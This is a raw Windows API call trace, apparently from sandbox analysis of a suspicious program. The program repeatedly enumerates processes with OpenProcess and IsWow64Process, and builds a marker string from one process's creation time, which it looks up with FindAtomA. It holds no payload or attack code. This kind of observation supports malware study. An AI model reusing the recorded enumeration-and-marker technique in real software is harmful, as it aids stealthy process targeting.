	[0077.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.675] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.675] CloseHandle (hObject=0x224) returned 1
	[0077.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.676] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.676] CloseHandle (hObject=0x224) returned 1
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.750] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.751] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.752] CloseHandle (hObject=0x224) returned 1
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.752] CloseHandle (hObject=0x224) returned 1
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.752] CloseHandle (hObject=0x224) returned 1
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.752] CloseHandle (hObject=0x224) returned 1
	[0077.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.752] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.752] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.753] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.753] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.754] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.754] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.755] CloseHandle (hObject=0x224) returned 1
	[0077.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.755] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.756] CloseHandle (hObject=0x224) returned 1
	[0077.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.756] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.757] CloseHandle (hObject=0x224) returned 1
	[0077.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.757] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.757] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.757] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.757] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.758] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.758] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.758] CloseHandle (hObject=0x224) returned 1
	[0077.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.758] CloseHandle (hObject=0x224) returned 1
	[0077.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.758] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.758] CloseHandle (hObject=0x224) returned 1
	[0077.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0077.829] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.829] CloseHandle (hObject=0x224) returned 1
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0077.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.830] CloseHandle (hObject=0x224) returned 1
	[0077.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0077.830] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0077.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0077.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0077.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0077.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0077.831] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.831] CloseHandle (hObject=0x224) returned 1
	[0077.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0077.832] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.832] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0077.833] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.833] CloseHandle (hObject=0x224) returned 1
	[0077.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0077.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.834] CloseHandle (hObject=0x224) returned 1
	[0077.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0077.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.834] CloseHandle (hObject=0x224) returned 1
	[0077.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0077.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.834] CloseHandle (hObject=0x224) returned 1
	[0077.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.834] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.834] CloseHandle (hObject=0x224) returned 1
	[0077.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0077.834] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.834] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0077.835] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0077.835] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0077.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.835] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0077.835] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0077.835] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0077.835] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0077.835] CloseHandle (hObject=0x224) returned 1
	[0077.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0077.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0077.835] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.835] CloseHandle (hObject=0x224) returned 1
	[0077.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0077.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0077.836] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0077.836] CloseHandle (hObject=0x224) returned 1
	[0077.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0077.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0077.907] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0077.908] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
